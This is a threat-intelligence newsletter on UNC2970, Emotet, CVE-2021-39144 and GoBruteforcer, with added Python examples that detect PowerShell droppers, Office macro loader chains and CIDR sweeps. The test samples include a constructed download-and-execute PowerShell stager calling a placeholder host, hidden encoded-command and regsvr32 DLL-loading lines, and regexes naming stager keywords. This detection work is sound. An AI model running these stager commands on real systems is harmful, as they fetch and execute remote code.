[CyberLand News] Weekly #4 - Threats and Malware
Latest news on threats, malware and vulnerabilities in the cyber land
Contents
New malware families for UNC2970
Emotet Returns
CISA alert on CVE-2021-39144
Exposed Services targeted by GoBruteforcer malware
New malware families for UNC2970
The North Korean cyber espionage group tracked as UNC2970 has been using previously unknown malware families in a spear-phishing campaign against media and technology organizations in the US and Europe since June 2022. UNC2970 is the name now given to activity that Mandiant previously tracked as UNC577 (also known as Temp.Hermit); it also encompasses a newer threat cluster, UNC4034.
In September 2022, Mandiant documented the use of WhatsApp by UNC4034 to socially engineer targets into downloading a backdoor called AIRDRY.V2 under the pretext of sharing a skills assessment test. Temp.Hermit is a primary hacking unit associated with North Korea's Reconnaissance General Bureau (RGB), along with Andariel and APT38 (also known as BlueNoroff); all three actor sets are collectively referred to as the Lazarus Group (also known as Hidden Cobra or Zinc).
The latest set of attacks by UNC2970 begins by directly approaching users on LinkedIn using fake accounts posing as recruiters that are "well designed and professionally curated." The conversation is then moved to WhatsApp, where a phishing payload is delivered to the target under the guise of a job description. UNC2970 has also reportedly used Microsoft Intune, an endpoint management solution, to drop a bespoke PowerShell script containing a Base64-encoded payload called CLOUDBURST, a C-based backdoor that communicates via HTTP.
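A first triage step for a script of the kind described above, as an added example (this is not Mandiant's code and does not reproduce CLOUDBURST): pull every long Base64 run out of a PowerShell file, decode it, and classify what comes out, which separates an embedded executable from a second-stage command. The sample script, the fake PE header and the example.invalid URL are constructed for the demonstration; a real -EncodedCommand blob is UTF-16LE, which the classifier handles.

```python
"""Decode Base64 runs embedded in a PowerShell script and classify the payloads.

Added example: not Mandiant's tooling and not a CLOUDBURST sample. The script
text, the fake PE header and the example.invalid URL are constructed here.
"""
import base64
import binascii
import re

# Constructed payloads. The "PE" is only an MZ/PE header plus filler.
_FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 200
_STAGE2 = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/x")'

# Constructed dropper: writes a DLL from a Base64 blob, then runs a second
# stage via -EncodedCommand, which takes UTF-16LE text.
SAMPLE_PS1 = "\n".join([
    "$p = [Convert]::FromBase64String('%s')" % base64.b64encode(_FAKE_PE).decode(),
    '[IO.File]::WriteAllBytes("$env:TEMP\\svc.dll", $p)',
    "powershell -NoP -w hidden -EncodedCommand %s"
    % base64.b64encode(_STAGE2.encode("utf-16-le")).decode(),
])

# Runs of 40+ Base64 characters; shorter runs are mostly identifiers and noise.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Markers of a PowerShell stager inside decoded text.
STAGER_RE = re.compile(r"IEX|Invoke-Expression|DownloadString|FromBase64String", re.I)


def extract_blobs(script: str):
    """Yield (blob, decoded_bytes) for every run that decodes as valid Base64."""
    for m in B64_RE.finditer(script):
        blob = m.group(0)
        try:
            yield blob, base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue


def _to_text(data: bytes):
    # ASCII in UTF-16LE has a NUL as every second byte; check that layout
    # first, otherwise UTF-8 would "succeed" and hide the stager keywords.
    if data and len(data) % 2 == 0 and set(data[1::2]) == {0}:
        return data.decode("utf-16-le", errors="replace")
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return None


def classify(data: bytes) -> str:
    """Label decoded bytes by what they contain."""
    if data[:2] == b"MZ":
        return "pe-executable"
    if data[:4] == b"\x7fELF":
        return "elf-executable"
    text = _to_text(data)
    if text is None:
        return "binary"
    if STAGER_RE.search(text):
        return "powershell-stager"
    return "text"


def scan(script: str):
    """Return (label, size, first bytes) for each embedded blob, in file order."""
    return [(classify(d), len(d), d[:8]) for _, d in extract_blobs(script)]


if __name__ == "__main__":
    for label, size, head in scan(SAMPLE_PS1):
        print(f"{label:18} {size:6d} bytes  {head!r}")
```

The 40-character minimum keeps ordinary identifiers out of the match set; anything that decodes to an MZ or ELF header is worth carving to disk and hashing before it is allowed to run.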
More details in “Stealing the LIGHTSHOW (Part One) — North Korea's UNC2970“ / “Stealing the LIGHTSHOW (Part Two) — LIGHTSHIFT and LIGHTSHOW“
More details in “It's Time to PuTTY! DPRK Job Opportunity Phishing via WhatsApp“
Emotet Returns
The Emotet malware has resurfaced after a three-month hiatus, spamming malicious emails once again and rebuilding its network to infect devices worldwide. This infamous malware is spread by email with malicious Microsoft Word and Excel attachments. When users open these documents and enable macros, the Emotet DLL is downloaded and loaded into memory.
Once loaded, Emotet remains dormant, awaiting instructions from a remote command and control server. When tasked, it steals victims' emails and contacts for future Emotet campaigns or downloads additional payloads such as Cobalt Strike or other malware that commonly leads to ransomware attacks.
Once considered the most widely distributed malware, Emotet has gradually slowed down; its previous spam operation, in November 2022, lasted only two weeks.
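The macro-to-DLL chain described above gives defenders a reliable hunt: an Office process should not be spawning regsvr32.exe or rundll32.exe with a DLL under a user-writable path. Below is an added detection example, not code from the cited articles; the events are constructed in a Sysmon-style JSON shape and the field names (ParentImage, Image, CommandLine) are assumptions to be mapped onto your own telemetry.

```python
"""Flag Office applications spawning DLL loaders, the chain behind Emotet's macro lures.

Added detection example, not code from the cited articles. The events are
constructed in a Sysmon-style JSON shape; the field names are assumptions.
"""
import json
import ntpath
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children a macro typically uses to fetch or load its DLL.
LOADERS = {"regsvr32.exe", "rundll32.exe", "powershell.exe", "cmd.exe",
           "wscript.exe", "cscript.exe", "mshta.exe"}
# A DLL under a user-writable path is the usual place a downloaded stage lands.
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.I)

# Constructed process-creation events (JSON lines); backslashes are escaped as JSON requires.
SAMPLE_LOG = [
    r'{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "WINWORD.EXE /n invoice.doc"}',
    r'{"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\regsvr32.exe", "CommandLine": "regsvr32.exe /s C:\\Users\\alice\\AppData\\Local\\Temp\\pQ1.dll"}',
    r'{"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -enc SQBFAFgA"}',
    r'{"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\splwow64.exe", "CommandLine": "C:\\Windows\\splwow64.exe 12288"}',
    "not json at all",
]


def triage(event: dict):
    """Return a finding for an Office-to-loader spawn, or None."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    cmd = event.get("CommandLine", "")
    if parent not in OFFICE_APPS or child not in LOADERS:
        return None
    # regsvr32/rundll32 pointed at a DLL in a user-writable directory is the
    # highest-confidence shape; other loader children are still worth a look.
    if child in {"regsvr32.exe", "rundll32.exe"} and USER_WRITABLE.search(cmd):
        severity = "high"
    else:
        severity = "medium"
    return {"severity": severity, "parent": parent, "child": child, "cmd": cmd}


def scan_log(lines):
    """Run triage over JSON lines, skipping malformed records."""
    hits = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        hit = triage(event)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"[{hit['severity']}] {hit['parent']} -> {hit['child']}: {hit['cmd']}")
```

The legitimate print helper (splwow64.exe) spawned by Word shows why the child list is an allowlist of loaders rather than "anything Office starts"; tune the list against a baseline of your own Office process trees before alerting on the medium tier.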
More details in “Emotet Sending Malicious Emails After Three-Month Hiatus“
More details in “Emotet malware attacks return after three-month break“
CISA alert on CVE-2021-39144
The Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in VMware Cloud Foundation to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, tracked as CVE-2021-39144, lies in the XStream open-source library used by the affected VMware products and has been rated 9.8 out of 10 (CVSS) by VMware.
The vulnerability can be exploited by unauthenticated threat actors in simple attacks that do not require user interaction to remotely execute arbitrary code with root privileges on unpatched devices.
More details in “Advisories VMSA-2022-0027.1“
Exposed Services targeted by GoBruteforcer malware
Researchers at Unit 42 have uncovered a new variant of Golang-based malware, which they have dubbed GoBruteforcer. The malware targets web servers running phpMyAdmin, MySQL, FTP and Postgres services, and was initially detected by Palo Alto Networks' Next-Generation Firewall. After a deeper investigation, the team found that the malware was hosted on a legitimate website.
Further analysis of the malware revealed that the attacker had created binaries for x86, x64, and ARM processor architectures. Additionally, GoBruteforcer deployed an internet relay chat (IRC) bot on the victim server, which communicates with the attacker's server.
It is important to note that successful execution of the samples depends on specific conditions on the victim system: the binaries must be launched with particular arguments, and the targeted services must be present and protected by weak passwords.
GoBruteforcer uses a multiscan module to enumerate targets in a Classless Inter-Domain Routing (CIDR) range rather than attacking a single IP address: it selects a CIDR block and then probes every address within it. Scanning a whole block gives the malware a far wider pool of hosts to brute-force and significantly increases the scope of each attack.
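From the defender's side the CIDR sweep shows up as one source touching many neighbouring hosts on the brute-forced service ports. The following added example (not Unit 42's code) groups constructed firewall log lines by source, counts distinct destinations on the FTP, HTTP(S), MySQL and Postgres ports, and reports the smallest CIDR block that encloses the hosts touched; the log format, the port list and the addresses (documentation ranges) are assumptions made for the demonstration.

```python
"""Spot a CIDR sweep against brute-forceable services from connection logs.

Added example, not Unit 42's code. The log format, the port list and the
addresses (documentation ranges) are constructed for this demonstration.
"""
import ipaddress
import re
from collections import defaultdict

# Ports for the services GoBruteforcer targets: FTP, phpMyAdmin over HTTP(S),
# MySQL and Postgres. Assumed defaults; adjust to your environment.
SERVICE_PORTS = {21, 80, 443, 3306, 5432}

LOG_RE = re.compile(
    r"(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)"
)

# Constructed firewall log: one source walking 192.0.2.10-15 on service ports
# (plus one SSH probe that is ignored), and an unrelated client talking to a
# single web server.
SAMPLE_LOG = """\
2023-03-10T12:00:01Z src=203.0.113.7 dst=192.0.2.10 dport=3306 action=deny
2023-03-10T12:00:01Z src=203.0.113.7 dst=192.0.2.11 dport=3306 action=deny
2023-03-10T12:00:02Z src=203.0.113.7 dst=192.0.2.12 dport=5432 action=deny
2023-03-10T12:00:02Z src=203.0.113.7 dst=192.0.2.13 dport=21 action=allow
2023-03-10T12:00:03Z src=203.0.113.7 dst=192.0.2.14 dport=80 action=allow
2023-03-10T12:00:03Z src=203.0.113.7 dst=192.0.2.15 dport=3306 action=deny
2023-03-10T12:00:03Z src=203.0.113.7 dst=192.0.2.16 dport=22 action=deny
2023-03-10T12:00:04Z src=198.51.100.4 dst=192.0.2.20 dport=443 action=allow
2023-03-10T12:00:05Z src=198.51.100.4 dst=192.0.2.20 dport=443 action=allow
""".splitlines()


def enclosing_network(addrs):
    """Smallest CIDR block containing every address; widen one bit at a time."""
    net = ipaddress.ip_network(str(addrs[0]))
    while not all(a in net for a in addrs):
        net = net.supernet()
    return net


def detect_sweeps(lines, min_hosts=5):
    """One alert per source that hit >= min_hosts distinct hosts on service ports."""
    by_src = defaultdict(lambda: {"hosts": set(), "ports": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        port = int(m.group("dport"))
        if port not in SERVICE_PORTS:
            continue
        entry = by_src[m.group("src")]
        entry["hosts"].add(ipaddress.ip_address(m.group("dst")))
        entry["ports"].add(port)
    alerts = []
    for src, entry in by_src.items():
        if len(entry["hosts"]) < min_hosts:
            continue
        hosts = sorted(entry["hosts"])
        alerts.append({
            "src": src,
            "hosts": len(hosts),
            "range": str(enclosing_network(hosts)),
            "ports": sorted(entry["ports"]),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_sweeps(SAMPLE_LOG):
        print(f"{alert['src']} swept {alert['hosts']} hosts in {alert['range']} "
              f"on ports {alert['ports']}")
```

The enclosing range is the useful output: a source that covers a whole /24 of your address space in seconds is a scanner, and the block it walked tells you which hosts to check for weak database, FTP and phpMyAdmin credentials before the brute-force stage succeeds.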
As the GoBruteforcer botnet is likely undergoing active development, its operators are expected to evolve their tactics and the malware's capabilities to effectively target web servers and stay ahead of security defenses.
More details in “GoBruteforcer: Golang-Based Botnet Actively Harvests Web Servers“
A.I. support for text and images